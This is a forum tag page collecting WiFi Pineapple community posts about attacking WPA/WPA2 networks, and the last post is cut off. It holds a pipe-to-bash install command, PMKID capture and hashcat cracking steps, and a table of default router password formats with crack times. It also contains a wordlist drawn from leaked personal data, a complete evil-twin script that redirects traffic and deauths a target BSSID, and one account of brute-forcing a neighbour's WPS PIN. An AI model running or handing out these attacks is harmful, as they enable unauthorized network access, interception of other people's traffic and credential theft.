Showing results for tags 'Wpa'.
  1. PMKID Attack WPA/WPA2 on WiFi Pineapples! Pineapple NANO + TETRA

WARNING! This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood of PMKIDs in a minute or less, even without access points! ONLY use hcxdumptool on networks and devices you have express permission to, because of this:

hcxdumptool is able to prevent complete wlan traffic!
hcxdumptool is able to capture PMKIDs from access points (only one single PMKID from an access point is required!)
hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required!)
hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required!)
hcxdumptool is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS)
hcxdumptool is able to capture passwords from the wlan traffic
hcxdumptool is able to capture plain master-keys from the wlan traffic
hcxdumptool is able to capture usernames and identities from the wlan traffic

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)!

The main advantages of this attack are as follows:
No more regular users required, because the attacker directly communicates with the AP (aka "client-less" attack)
No more waiting for a complete 4-way handshake between the regular user and the AP
No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
No more eventual invalid passwords sent by the regular user
No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
No more special output format (pcap, hccapx, etc.); final data will appear as a regular hex encoded string

The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.

This attack is quite new, and gets updated regularly. I've compiled it for the Pineapples and uploaded it to GitHub. As the tools get updated often, I will have to update the packages often. So please check back for updates!

Download: hcxtools (v6.1.2-1)
Download: hcxdumptool (v6.1.2-1)

Download and install both tools automatically by using this command on your Pineapple:

wget -qO- https://raw.githubusercontent.com/adde88/hcxtools-hcxdumptool-openwrt/openwrt-19.07/INSTALL.sh | bash -s -- -v -v

Last update: 18.09.2020
Changelog: Updated both tools to follow changes from upstream (@ZerBea)

Install procedure: Download the IPKs to your Pineapple and install them using opkg. (If you're using the Nano, remember to install them to your SD card.)

How do I use this?
Choose an interface, and make sure it's NOT being used by anything else! Let's use wlan1 in this example. (This will set the interface to monitor mode while working.)

hcxdumptool -o test.pcapng -i wlan1 --enable_status 3

This will use wlan1 to perform the attack and create a file named test.pcapng containing the PMKID. (You can try other options for --enable_status (1, 2, 4, 16?). Use --help for more info.) Filters can also be applied with --filterlist and --filtermode (again, read --help for details).

You can then use hcxpcaptool to convert the PMKID to a hash readable by hashcat.

hcxpcaptool -z test.16800 test.pcapng

The next step would be to transfer test.16800 to a desktop capable of running the latest version of hashcat (version 4.2.0 or higher), and then run the attack, for example like this: (This cracking process should NOT be done on the Pineapple!!!)

hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

GitHub repo + source code:
https://github.com/adde88/hcxtools-hcxdumptool-openwrt
https://github.com/adde88/openwrt-useful-tools

The first repo contains the IPK files, and the SDK Makefiles needed to compile the project yourself. The second repo contains a lot of other useful tools I've compiled over time for the Pineapple, if you're interested in taking a peek.

Donations are very helpful, and very much appreciated! And would help me contribute towards keeping all of these custom tools ported, alive, and up-to-date! ❤
  2. Compressed File Size: 4.4gb
Decompressed File Size: 13gb

Just thought I would share the link for those who are looking for a decent list to pen test their networks. The list contains 982,963,904 words exactly, no dupes, and all optimized for wpa/wpa2. Would also just like to point out that this is not my work; instead it was a guy who compiled a whole load of useful lists, including his own, to come up with 2 lists (one is 11gb and one is 2gb). I will be seeding this torrent indefinitely since it is shareware! 20mb up!

INFO
This is my final series of WPA-PSK wordlist(s), as you can't get any better than this! My wordlist is compiled from all known & some unknown internet sources such as:
   1. openwall
   2. coasts password collections
   3. Xploitz Master Password Collection(s) vol 1 and vol 2 (official Backtrack 3/4/4R1 wordlist collections, thanks Xploitz)
   4. ftp sites such as ftp://ftp.ox.ac.uk/pub/wordlists/ & others
   5. all wordlists on and (as of 07/11/2010)
   6. all wordlists hosted on;
   7. all usernames from "100 million Facebook usernames and personal details" as leaked onto torrent sites
   8. all wordlists from the Argon (site now closed)
And as a bonus my personal wordlist of 1.9 GB! Which also includes my "WPA-PSK WORDLIST 2 (107MB).rar" & "WPA-PSK WORDLIST (40 MB).rar" torrent & random usernames grabbed from over 30,000+ websites such as youtube, myspace, bebo & other sites which I can't mention .... he he
=============================================================================
ALL WITH NO DUPES OR BULL-SHIT AND IS FORMATTED TO WPA RULES OF 8-63 CHARS !!
=============================================================================
Hope you enjoy. :¬)
******** P.L.E.A.S.E S.E.E.D W.H.E.N ********
The Pirate Bay Download Link
ISO Hunt Download Link
Torrent Hound Download Link

Hope this helps anyone who is starting out and learning about pen testing and network security, and don't forget to seed for others!
  3. Hello all. I have been a fan of the hak5 team for a while and over the last 2-3 years have collected pretty much everything in the hak5 shop. I have all the things that do the things. Recently during a fever dream, I imagined that I had a new device. One that magically grabbed 4-way WPA handshakes with the push of a button and was small enough to hold in my tiny pen testing fist. We have all been there, right? We know there is a network with clients but we are just too far away to effectively do a deauth airodump attack. Sure we could get closer and open our Linux laptop, plug in a wonky antenna and fire up a couple terminals, but as if our hoody wasn't enough of an indication, now we'd really be drawing attention. Ok, maybe we all haven't been there, but at least I have, and when I awoke from that fever dream I thought to myself, damn, why didn't I think of this sooner. I need this thing to be as real as all my other things. Anyway, I went right to my work bench and started soldering away. I have started a GitHub repo for this thing that I'm tentatively calling FistBump. It's in its beta stage for sure and a fairly simple device really, but I would love some feedback. Please be constructive with your feedback, it's my first try at prototyping my own device. https://github.com/eliddell1/FistBump
  4. BESSIDE-NG - Customized for Pineapple TETRA

I'm writing a relatively short post, as I don't feel like writing an entire article explaining how to install this and use this. I've compiled a customized version of besside-ng that will automatically scan all the channels from 1 to 165. The scan will take almost a minute to complete, compared to some seconds when only scanning the 2.4GHz range. Also added an option to only scan WEP or WPA networks. I've also changed the directory that the logs get saved to. They can now be found in /tmp. The files are as usual: wep.cap, wpa.cap, besside.log

As usual, you can find it ready and compiled on my GitHub repo (source code is there as well):
https://github.com/adde88/besside-ng_pineapple

I will not be providing heavy support on this. I might take a couple of short questions, or if you have a good idea for any improvements I might take my time and implement it. Cheerio!
  5. So I see a lot of scripts like wifiphisher and fluxion. They work great, but the only sad part is when they clone the wireless network... Is it possible to let the user automatically connect to our fake access point by disabling their own access point, like without displaying the access point in the wifi list?
  6. Hopefully some of you will find this table useful for (legally and ethically) pentesting WiFi routers. Please note that the figures shown in the far right column 'Time' are based on a Palit GTX 970 using oclHashCat. You will need to do your own maths for this, but it gives you a good idea of average crack times for a fairly standard £300 / $500 GPU.

For WPA2 with the GTX 970, my benchmarks with hashcat are:
13,774,031,184 password hashes per day
573,917,966 per hour
9,565,299 per minute
159,421 per second

Anything marked as 'Never' and red will take more than a year to crack. Anything green is less than 1 week. Anything amber is unknown or will require a word list.

For EE/Brightbox wordlist details, see here (appears to have been taken down. Google cache search.) For NETGEAR details, see here. Obviously most of you will find the SSID / Password Format / Length columns the most useful. Good info!

| SSID | Length | Password Format | Combinations | Time |
|---|---|---|---|---|
| 2WIREXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| 3MobileWiFi | 8 | 0-9 a-z | 2,821,109,907,456 | 7 mth |
| 3Wireless-Modem-XXXX | 8 | 0-9 A-F (The first 4 digits are the same as the 4 digits on the SSID!) | 65,536 | 1 sec |
| Alice_XXXXXXXX | 24 | 0-9 a-z | 22,452,257,707,354,557,240,087,211,123,792,674,816 | Never |
| AOLBB-XXXXXX | 8 | 0-9 A-Z | 2,821,109,907,456 | 7 mth |
| ATT### | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| ATTxxxx 0000 | 10 | 0-9 A-Z | 3,656,158,440,062,976 | Never |
| ATTxxxxxxx | 12 | a-z + symbols | 1,449,225,352,009,601,191,936 | Never |
| belkin.xxx | 8 | 2-9 a-f | 1,475,789,056 | 2.5 hrs |
| belkin.xxxx | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| Belkin.XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| Belkin_XXXXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| BigPondXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| BOLT!SUPER 4G-XXXX | 8 | 4 numbers + Last 4 of SSID | 65,536 | 1 sec |
| BrightBox-XXXXXX | - | 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. | | Need dict. |
| BTHomeHub(1)-XXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| BTHomeHub2-XXXX | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub3 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub4 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub5 | 10 | 2-9 a-f | 289,254,654,976 | 3 wks |
| BTHub6 | 10, 12 | 0-9 a-z A-Z | 100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 | Never |
| CenturyLinkXXXX | 14 | 0-9 a-f | 72,057,594,037,927,936 | Never |
| Cisco | 26 | 0-9 a-f | 43,608,742,899,428,874,059,776 | Never |
| Digicom_XXXX | 8 | 0-9 A-Z | 2,821,109,907,456 | 7 mth |
| DJAWEB_##### | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| Domino-XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| E583x-xxxx | 8 | 0-9 | 10,000,000 | 1 min |
| E583x-xxxxx | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| EasyBox 904 LTE | 9 | 0-9 a-z A-Z | 13,537,086,546,263,552 | Never |
| EasyBox-###### | 9 | 0-9 A-F | 68,719,476,736 | 5 days |
| EEBrightBox-XXXXXX | - | 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. | | Need dict. |
| FRITZ!Box Fon WLAN #### | 16 | 0-9 | 10,000,000,000,000,000 | Never |
| FrontierXXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| Hitron | 12 | 0-9 A-Z (sometimes use the device's serial number as the default key!) | 4,738,381,338,321,616,896 | Never |
| INFINITUM#### | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| iPhone 5 | ? | Lowercase word plus 4 numbers | 172000^65,536 | Need dict. |
| Keenetic-XXXX | 8 | 0-9 a-z A-Z | 218,340,105,584,896 | Never |
| Linkem_XXXXXX | 8 | 0-9 | 10,000,000 | 1 min |
| Livebox-XXXX | ? | ? | | |
| mifi2 | 13 | 0-9 A-Z | 170,581,728,179,578,208,256 | Never |
| MobileWifi-xxxx | 8 | 0-9 | 10,000,000 | 1 min |
| MYWIFI (EE) | - | MYWIFI + 4 numbers | 65,536 | 1 sec |
| NETGEARXX | - | Adjective + Noun + 3 numbers | | Need dict. |
| Netia-XXXXXX | 13 | 0-9 a-f | 4,503,599,627,370,496 | Never |
| ONOXXXX | 10 | 0-9 | 10,000,000,000 | 17 hrs |
| Orange-0a0aa0 | 8 | 0-9 a-f | 4,294,967,296 | 7.5 hrs |
| Orange-AA0A00 | 12 | 0-9 A-F | 281,474,976,710,656 | Never |
| Orange-XXXX | 8 | 2345679 ACEF | 214,358,881 | 23 mins |
| PLDT | - | PLDTWIFI + Last 5 digits of router MAC | 1 | 1 sec |
| Plusnet Broadband UK | 64 | a-z A-Z 0-9 | - | Never |
| PlusnetWireless-XXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| PLUSNET-XXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| Sitecom_XXXX | 8 | 0-9 A-F | 4,294,967,296 | 7.5 hrs |
| SKYXXXXX | 8 | A-Z (http://www.ph-mb.com/products/sky-calc) | 208,827,064,576 | 2 wks |
| SpeedTouchXXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| TALKTALK-XXXXXX | 8 | 346789 A-Z (bar ILOSZ) | 282,429,536,481 | 3 wks |
| TDC-#### | 9 | 0-9 a-f | 68,719,476,736 | 5 days |
| Tech_XXXXXXXX | 8 | A-Z | 208,827,064,576 | 15 days |
| Technicolor-Router | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| Telecom-XXXXXXXX | ? | ? | | |
| TelstraXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| TELUSXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| Thomson | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| ThomsonXXXXXX | 10 | 0-9 a-f | 1,099,511,627,776 | 2.5 mth |
| TIM_PN51T_XXXX | 8 | 0-9 (WPS PIN is 12345670) | 10,000,000 | 1 min |
| TNCAP-XXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| TNCAPXXXXXX | 10 | 0-9 A-F | 1,099,511,627,776 | 2.5 mth |
| TP-LINK_###### | 8 | 0-9 0-9 A-F | 10,000,000 | 1 min |
| TRENDnet TEW-123ABC | 11 | First 3 digits in SSID (123 here) + 8 digits (https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries) | 2,821,109,907,456 | 7 mth |
| TRKASHI-###### | 8 | 2 numbers, 6 digits | (10^2)^(26^6) | Need dict. |
| UNITE-XXXX | 8 | 0-9 | 10,000,000 | 1 min |
| UPCXXXXXXX | 8 | A-Z | 208,827,064,576 | 15 days |
| Verizon MIFIXXXX XXXX | 11 | 0-9 | 100,000,000,000 | 7.5 days |
| virginmediaXXXXXX | 8 | a-z (bar iol) | 78,310,985,281 | 6 days |
| VirginMobile MiFiXXXX XXX | 11 | 0-9 | 100,000,000,000 | 7.5 days |
| VMXXXXXXX | 12 | 0-9 a-z A-Z | 3,226,266,762,397,899,821,056 | Never |
| VMXXXXXXX-2G | 8 | a-z (bar iol) | 78,310,985,281 | 6 days |
| VMXXXXXXX-5G | 8 | a-z (bar iol) | 78,310,985,281 | 6 days |
| Vodaphone_XXXXXXXX | 15 | 0-9 a-z | 221,073,919,720,733,357,899,776 | Never |
| WLAN1-XXXXXX | 11 | 0-9 A-F | 17,592,186,044,416 | Never |
| ZyXELXXXXXX | 13 10 | 0-9 A-Z 0-9 A-F | 1,099,511,627,776 | 2.5 mth |

Please inform me of any inaccuracies or additional data you feel could be added. Enjoy!

*edit* My sources are my own personal experiences, plus:
http://xiaopan.co/forums/threads/netgearxx-wordlist.6571/
https://scotthelme.co.uk/ee-brightbox-router-hacked/
https://forum.hashkiller.co.uk/topic-view.aspx?t=1660&m=46959#46959
https://forum.hashkiller.co.uk/topic-view.aspx?t=2715&p=2
  7. Hi There, Does anyone know how to broadcast only the SSIDs without security, so only the open networks? My nano is now broadcasting all networks, so all the networks with a password will also be broadcast without a password from my nano. Thanks!
  8. Hi all, As the title suggests, I was wondering why WPA should be easier to crack than WPA2, and yet the process to crack them appears to be the same? The hash mode in Hashcat is exactly the same for WPA and WPA2, so surely they would take the exact same amount of time to break? Is there a quicker way to break WPA? I found http://www.aircrack-ng.org/doku.php?id=tkiptun-ng, but this appears to only be for WPA-TKIP, and doesn't look like a finished product. At the moment, are we doomed to cracking WPA using the same methods as WPA2? Thanks.
  9. I have google searched for a few days, but I was hoping that someone could give me the answer I need. What is the full character set for WPA/WPA2 passwords? I believe it is a minimum of 8 digits, but I have read that the maximum is 40 and also that it is 63. Could you please clarify? I know we have all upper and lower case letters and the numbers 0-1, but I would like to know what special characters are allowed as well. So what I have for sure is: 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ There must be some special characters to add onto that. Thanks in advance.
  10. I would like to ask about tutorials on certain subjects. I know SSL stripping is already online, but there are a few things I'd like to learn to do with my wifi pineapple:
viewing traffic on an open network
password sniffing
cracking wpa/wpa2, even if it doesn't have wps enabled (the whole process)
sniffing traffic on a wpa/wpa2 network
Also, I don't know if you have tutorials for all of this already, but I really think it would be good to go from beginner pineapple skills all of the way through expert, so I could become a more experienced hacker. I don't see tutorials for every infusion out there and I think there are less than 500 different infusions for the mark v. Could someone help me out with finding English tutorials for this stuff?
  11. Hi, I want to ask what other programs exist for finding the pass phrase of a WPA handshake besides aircrack-ng and cowpatty, for the Linux platform, especially server, CPU based. From what I understand, pyrit is GPU based. What's wrong with aircrack and cowpatty? Well.. I want to use an openSUSE11 server BUT I don't have root rights to install all prerequisites and compile aircrack. Cowpatty compiles and works fine, but it's single-threaded. I know I can break up the wordlist into e.g. 4 and run four instances, but sometimes it does not recognize the handshake as well as aircrack-ng. Just asking if there are any other alternatives. Thank you
  12. Pyrit WPA password cracker updated! I've been maintaining this project for a while now, please spread the word: https://github.com/JPaulMora/Pyrit Added some extra options and performance improvements.
  13. I'm working on an eviltwin infusion for the pineapple but still have a long way to go. So far I'm writing an eviltwin script without the pineapple to make sure I get that right. The script still needs some work. I need help to improve it. I'm writing the script based on this video.

#touch eviltwin
#nano eviltwin (copy & paste script)
#chmod +x eviltwin
#./eviltwin (This will not setup your mysql database)

#!/bin/bash
##########################################
# Evil Twin Access Point v0.1            #
#                                        #
# written by: sithstalker                #
# not yet tested on wifi pineapple       #
##########################################

# Downloading www files
echo "downloading www files..."
DIR1="/var/www/styles"
if [ -d "$DIR1" ]; then
  echo "You already have the eviltwin files..."
  sleep 2
else
  echo "Getting the /var/www eviltwin files and creating backup to /var/orig-www"
  sleep 2
  mkdir /var/orig-www && mv /var/www/* /var/orig-www/
  cd /var/www && wget http://hackthistv.com/eviltwin.zip
  sleep 2
  unzip eviltwin.zip
  sleep 2
fi

# Killing active processes
echo "Killing airbase-ng"
pkill airbase-ng
sleep 2
echo "Killing dhcpd"
pkill dhcpd3
sleep 2

# Getting required information
echo -n "Enter your local ip address and press [ENTER] (e.g. 192.168.1.45): "
read lhost
echo -n "Enter your wlan interface and press [ENTER] (e.g. wlan0): "
read wlan_int
echo -n "Enter the subnet for your DHCP scope and press [ENTER] (e.g. 192.168.1.128): "
read dhcp_subnet
echo -n "Enter the subnetmask for your DHCP scope and press [ENTER] (e.g. 255.255.255.128): "
read dhcp_subnetmask
echo -n "Enter the broadcast address for your dhcp scope and press [ENTER] (e.g. 192.168.1.255): "
read dhcp_broadcast
echo -n "Enter the default gateway for your DHCP Scope and press [ENTER] (e.g. 192.168.1.129): "
read dhcp_dgw
echo -n "Enter the DNS Server for your DHCP Scope and press [ENTER] (e.g. 8.8.8.8): "
read dhcp_dns
echo -n "Enter the start address of your DHCP scope and press [ENTER] (e.g. 192.168.1.100): "
read dhcp_start
echo -n "Enter the last address of your DHCP scope and press [ENTER] (e.g. 192.168.1.150): "
read dhcp_last
echo -n "Enter the SSID you like to use for your Access Point and press [ENTER] (e.g. eviltwin): "
read ssid
echo -n "Enter the Channel you like to use for your Access Point and press [ENTER] (e.g. 11): "
read channel
echo -n "Enter the interface name which is connected to the internet and press [ENTER] (e.g. eth0): "
read inet_int
echo -n "Enter the target Bssid and press [ENTER] (e.g. SI:TH:ST:AL:KE:R0): "
read bssid

# Setting dhcpd config to /etc/dhcp/dhcpd.conf
echo "setting dhcpd config in /etc/dhcp/dhcpd.conf"
sleep 2
# check if there already is a backup directory for the original dhcpd.conf file
DIR="/etc/dhcp/orig_conf"
if [ -d "$DIR" ]; then
  echo "You already have a backup directory for the original dhcpd.conf"
  sleep 2
else
  echo "You do not have a backup directory for the original dhcpd.conf file... I will create one"
  sleep 2
  mkdir /etc/dhcp/orig_conf
fi
# check if there already is a backup of the original dhcpd.conf file. If not one will be created
if [ "$(ls -A $DIR)" ]; then
  echo "You already have a backup of the original configuration file in /etc/dhcp/orig_conf"
  sleep 2
else
  echo "creating backup of original dhcpd config file to /etc/dhcp/orig_conf"
  sleep 2
  cp /etc/dhcp/dhcpd.conf /etc/dhcp/orig_conf/dhcpd.conf
  rm /etc/dhcp/dhcpd.conf
fi
# the range must use the variable read above ($dhcp_last); the original used the undefined $dhcp_stop
echo "default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet $dhcp_subnet netmask $dhcp_subnetmask {
  option subnet-mask $dhcp_subnetmask;
  option broadcast-address $dhcp_broadcast;
  option routers $dhcp_dgw;
  option domain-name-servers $dhcp_dns;
  range $dhcp_start $dhcp_last;
}" > /etc/dhcp/dhcpd.conf

# Starting monitor mode on $wlan_int
echo "putting $wlan_int into monitor mode. You can check that later by using iwconfig command"
sleep 2
airmon-ng stop $wlan_int
sleep 5
airmon-ng start $wlan_int
sleep 5

###################################################################
# Starting airbase-ng with SSID=$ssid and channel=$channel
echo "starting airbase-ng with SSID $ssid and channel $channel"
sleep 2
airbase-ng -e $ssid -c $channel -P mon1 &
sleep 5

###################################################################
# starting new generated interface at0 and assign ip address
echo "starting at0 with ip $dhcp_dgw and subnetmask $dhcp_subnet and create a route for that"
sleep 2
ifconfig at0 down
sleep 2
ifconfig at0 $dhcp_dgw netmask $dhcp_subnetmask
sleep 2
ifconfig at0 up
sleep 2
route add -net $dhcp_subnet netmask $dhcp_subnetmask gw $dhcp_dgw
sleep 2

# Setup iptables with nat for the new network
echo "setting up iptables with nat for the new network"
sleep 2
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
#iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $inet_int -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $lhost:80
iptables -t nat -A POSTROUTING -j MASQUERADE

# Clear DHCP leases
echo "clearing dhcp leases"
sleep 2
echo > '/var/lib/dhcp/dhcpd.leases'

# creating a symlink to dhcpd.pid
#ln -s /var/run/dhcp3-server/dhcp.pid /var/run/dhcpd.pid

# start dhcp server and enable ip forwarding
echo "starting dhcp and enabling ip forwarding"
sleep 2
#dhcpd3 -d -f -cf /etc/dhcp/dhcpd.conf at0 &
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
echo "1" > /proc/sys/net/ipv4/ip_forward
/etc/init.d/isc-dhcp-server start

echo $bssid > blacklist
mdk3 mon1 d -b blacklist -c $channel
  14. After four months of relentless persistence I finally was able to bruteforce my neighbor's WPS PIN. After spending days of AP lock and figuring out the precise x:y values, I found that the WPA PSK is an 8-digit number (like all other PSKs), but it got me thinking: what if I did a direct bruteforce of the PSK? I don't know if the AP could actually lock that (hence no new device can connect even with the right pass), but if we talk about 200 tries/day I think it can be cracked in a guaranteed 55 days (11000/200). I'm a newbie at this stuff, so please: is there a script for that, or is my theory stupid-wrong? Thanks
  15. Hi, I am quite new to password generation so forgive me if this is a stupid question :) I am trying to generate all possible combinations of WPA keys for BigPond modems in Australia. I have identified the layout of every single key that they generate. They look like this: 1234E5678D, and it's always the same layout: "the first 4 characters are numbers, then the 5th character is a capital letter, then the next 4 are numbers again and the last is a letter". But for the life of me I cannot seem to work out how to generate keys with such specific parameters. Any ideas how I would accomplish this? Any help would be much appreciated.
  16. Hey Everyone. Who has heard of Sophos? Or Warbiking? Perhaps you may know it as War Driving. Sophos is a UK-based security company and they are doing a very nice job of showing security experts the general habits of the people hungry for WiFi. What's very interesting is he is doing it all with the Hak 5 WiFi Pineapple. If you watch a video you can see it there; clearly James is not about to reveal what it really is, loosely calling it an "access point", but anyone from here will see it's a Mk 5. Latest news article: 'Warbiking' reveals increasing need for Sydneysiders to change wireless security habits http://www.cmo.com.au/mediareleases/19781/warbiking-reveals-increasing-need-for/ For those of you in London, San Fran etc., you may find your city has already been "Warbiked" by this fellow. http://www.sophos.com/en-us/security-news-trends/security-trends/bottom-line/project-warbike.aspx As this fellow is not going to get to every town and city, it would be cool to see other members' survey results. How does your town compare to the recent results of Sydney?
  17. Hello everyone, I apologize if I have missed a thread where this has been covered and appreciate your help and time ^^ I have this card and I could set the tx power on Windows 7, and after installing Windows 8.1 Pro I cannot find this option anymore. Help? I think there is an option to set the tx power even higher, anyone know? The problem I have is when I use Windows 7 in VMWare, for some reason there isn't any tx power option, maybe only when it's installed as host? Also I have other questions regarding finding a WPA key, can I post them here?
  18. Hello, I've been using the pineapple's client mode quite happily on my routers in location 1, but am having no luck with any in location 2 - something I must assume is due to encryption types. I had read a few topics here regarding the issue (in particular one from 2013 mentioning a config alteration) but haven't had any luck. If someone could point me to existing topics on the matter or tell me what logs to post here for diagnosis that'd be great. Cheers, HP
  19. I have 2 additional wireless adaptors connected to my MK5 and I need to connect wlan3 to a WPA/WPA2 wireless network. What command do I run to connect to a WPA/WPA2 wireless network?

Interface  Chipset   Driver
wlan0      Atheros   ath9k - [phy0]
wlan1      RTL8187   rtl8187 - [phy1]
wlan2      RTL8187   rtl8187 - [phy2]
wlan3      Atheros   ath9k - [phy3]
  20. I know that decrypting WiFi WPA encrypted traffic when 4-way handshake is in the traffic dump and when passphrase is known is a trivial task. However, what about decrypting WPA traffic when 4-way handshake is not available. I have the SSID, I have the passphrase, I have messages 3 and 4 (I know it is useless) of the 4-way handshake. Is there a way of decrypting the traffic?
  21. So I know that the router generates random passwords in this structure: xxxx-xxxx-xxxx It uses all lowercase alphanumeric and includes the dashes, but no other special characters. I've been reading about generating rainbow tables, but all the options include too much, or won't allow me to generate 12 character long passwords. But I don't know if I totally understand the process yet, I'm still reading. Does anyone know a good way of generating either a plaintext dictionary or rainbow tables that fit this specific format only? I want to create a dictionary that includes all possible combinations for this format. Correct me if I'm wrong, but there should be: 62^12 = 3,226,266,762,397,899,821,056 possible combinations? This is for my personal TP-Link router that I bought. Noticed this default password formatting and want to see if I can generate a customized table for it. Really appreciate any advice or input.
  22. What is FruityCracker?
FruityCracker is a bash script that can crack wireless networks, capture WPA handshakes, Evil Twin (Open, WEP, WPA, WPA2) and more features to come!
Compatibility
Tested Configuration: Pineapple MK5 1.0.4
Questions or Problems
Please let me know what you would like to see in this script below!
Release Date: Unknown.
Author: Jesse Izeboud
Other scripts I made: FruitySniffer
  23. Is it possible, and how, to capture handshakes with one device and send all captured handshakes to another device for cracking? The cracking device isn't in wireless range. The handshake device has 3G mobile broadband.
  24. I have been using reaver to brute-force attack a WPA/WPA2 connection, but I seem to have a problem: the WPS pin cannot be found. It stops searching for a PIN at a specific place. Why is this happening? And by the way I am using reaver from BEINI OS, using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and I've got it, but I cannot crack it since I don't have a proper dictionary and I don't have the means to download one. I look forward to a reply to this thread. Thank you ^_^
  25. I have been using reaver to brute-force attack on my WPA/WPA2 connection, but I seem to have a problem: the WPS pin cannot be found. It stops searching for a PIN at a specific place. Why is this happening? And by the way I am using reaver from BEINI OS, using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and I've got it, but I'm not sure if it really has a PSK or not because I tried cracking it using Cloudcracker and so far unsuccessful. I've tried with the 1.2 billion dictionary word list and I was unsuccessful. The router I am using for the WiFi is a Belkin 3bb9 router, which is known for its security standards. So my question is how do I fix this outcome for a positive one and what should I try?

Arguments used on reaver: I used the following arguments in reaver: -a -v -S -x 20 -r 100:10 -l 300

And the output is:
Waiting for beacon from : 08:86:3B:FD:CB:B0
Associalted with 08:86:3B:FD:CB:B0 (BSSID: belkin.3bb9)
Trying pin 12345670
Trying pin 12345670
Trying pin 12345670
Trying pin 12345670
Trying pin 12345670
Trying pin 12345670
Trying pin 12345670
(0.00% complete @ 2013-06-26 :18:53 (0 seconds/pin)
WARNING 10 false connections in a row
Trying pin 12345670
Trying pin 12345670
Trying pin 12345670

And it goes on as the same... No change. Is there any solution to this? And I used wireless card: wlan0 Atheros AR9285 ath9k-[phy0]. I have atta